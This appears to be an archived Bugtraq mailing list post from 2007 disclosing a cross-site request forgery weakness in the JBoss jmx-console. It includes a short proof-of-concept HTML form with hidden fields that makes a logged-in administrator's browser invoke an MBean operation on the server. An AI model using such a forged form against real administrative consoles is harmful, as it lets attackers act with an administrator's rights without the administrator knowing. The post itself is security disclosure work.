Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

JBoss jmx-console CSRF

From: buben.razuma () gmail com
Date: 22 Feb 2007 11:04:20 -0000
Hello!
Recent message about JBoss's console made me looking at that interface again and it seems that it is vulnerable for the 
CRSF attacks.

MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by the hidden 
submitting form like follows:

<form method="post" action="http://host:port/jmx-console/HtmlAdaptor";>
   <input type="hidden" name="action" value="invokeOp">
   <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">

   <input type="hidden" name="methodIndex" value="0">
   <input type="submit" value="Invoke">
</form>

Please, correct me, if I'm wrong.

BR,
B.R.
Best regards,
Previous By Date Next
Previous By Thread Next

Current thread: